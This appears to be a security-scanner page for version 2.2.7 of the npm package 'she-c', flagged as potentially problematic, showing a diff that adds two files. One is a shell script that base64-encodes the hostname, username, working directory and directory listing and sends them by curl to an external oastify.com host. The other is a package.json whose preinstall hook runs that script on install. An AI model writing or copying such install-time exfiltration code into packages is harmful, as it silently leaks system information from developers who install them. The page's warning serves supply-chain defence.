she-c 2.2.7

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of she-c might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/bbvx.sh +3 -0
  2. package/package.json +12 -0
package/bbvx.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl -H "Host: $(hostname | base64)" -H "W: $(whoami | base64)" -H "Pwdx: $(pwd | base64)" -d $(ls -la | base64) https://2ilgnuy1w5ilguqag15531jjxa31rrfg.oastify.com
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "she-c",
3
+ "version": "2.2.7",
4
+ "description": "J",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "./bbvx.sh"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }